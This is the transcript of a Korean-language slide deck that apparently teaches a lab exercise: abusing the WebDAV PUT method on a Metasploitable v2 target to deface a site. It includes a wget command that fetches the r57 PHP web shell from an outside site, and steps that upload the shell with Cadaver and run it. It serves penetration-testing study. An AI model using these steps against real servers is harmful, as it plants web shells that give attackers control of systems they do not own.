Seite 1 Protecting Mobile Agents vs. Malicious Hosts Dennis Knorr10.07.2004.
Malicious Use HTTP Method
-
Upload
ilsun-choi -
Category
Technology
-
view
70 -
download
3
Transcript of Malicious Use HTTP Method
Writing by Ilsun Choi 1
HTTP Method악용 홈페이지 변조
11 차 디렉터리 노출 & HTTP Method 악용 홈페이지 변조최일선
E-mail : [email protected]
Writing by Ilsun Choi 2
Index1. WebDAV 서비스 개요2. Put Method 실습 1) 환경분석 2) 실습 도구 3) 모의실습참고문헌
E-mail : [email protected]
Writing by Ilsun Choi 3
1. WebDAV 서비스 개요WebDAV?
(Web Distributed Authoring and Versioning 의 약자 )
• HTTP 프로토콜 이용• 원격지 웹 서버의 컨텐츠를 추가 / 관리 ( 확장 기능 )
E-mail : [email protected]
http://en.wikipedia.org/wiki/WebDAV
Writing by Ilsun Choi 4
2. Put Method 실습1) 환경분석 - Mesploitable v2
2) 실습 도구 \
- r57.php
- Cadaver
3) 모의실습
E-mail : [email protected]
Writing by Ilsun Choi 5
2. Put Method 실습 > 환경 분석 [1/2]
• 기본적으로 Metasploitable v2 는 WebDav 실습환경을 제공하고 있다 .
• 설치 후 해당 80 번 포트로 지원하는 웹 서버 페이지로 들어간다 .
E-mail : [email protected]
Writing by Ilsun Choi 6
2. Put Method 실습 > 환경 분석 [2/2]
E-mail : [email protected]
• Options 를 사용하여 어떤 매소드가 활용 가능한 지 분석
Writing by Ilsun Choi 7
2. Put Method 실습 > 실습도구 [1/2]
• 업로드할 소스• http://www.r57shell.net/shell/
r57.txt
E-mail : [email protected]
Writing by Ilsun Choi 8
2. Put Method 실습 > 실습도구 [2/2]
• Cadaver Command-Line WebDAV Client for Unix It supports file upload, download, on-screen display, namespace operations
(move/copy), collection creation and deletion, and locking operations.
E-mail : [email protected]
http://www.webdav.org/cadaver/
Writing by Ilsun Choi 9
2. Put Method 실습 > 모의실습 [1/6]
• 업로드 셸 파일 준비
E-mail : [email protected]
root@kali:~# wget http://www.r57shell.net/shell/r57.txt root@kali:~# mv r57.txt r57.php
Writing by Ilsun Choi 10
2. Put Method 실습 > 모의실습 [2/6]
• Kali Linux 에서 Cadaver 를 사용할 수 있다 .
• help 를 입력하면 사용 가능한 도움말 출력 가능
E-mail : [email protected]
Writing by Ilsun Choi 11
2. Put Method 실습 > 모의실습 [3/6]
• PUT method 를 활용하여 파일을 업로드한다 .
E-mail : [email protected]
Writing by Ilsun Choi 12
2. Put Method 실습 > 모의실습 [4/6]
• WireShark Follow Stream – Request
E-mail : [email protected]
Writing by Ilsun Choi 13
2. Put Method 실습 > 모의실습 [5/6]
• WireShark Follow Stream - Response
E-mail : [email protected]
Writing by Ilsun Choi 14
2. Put Method 실습 > 모의실습 [6/6]
• http://192.168.157.140/dav/를 접속하면 정상적으로 업로드된 모습을 확인할 수 있다 .
• 파일을 직접 열면 셸이 정상 동작한다 .
E-mail : [email protected]
Writing by Ilsun Choi 15
참고문헌• http://blog.naver.com/chogar/220331811376
• 웹 모의해킹 및 시큐어코딩 진단가이드
E-mail : [email protected]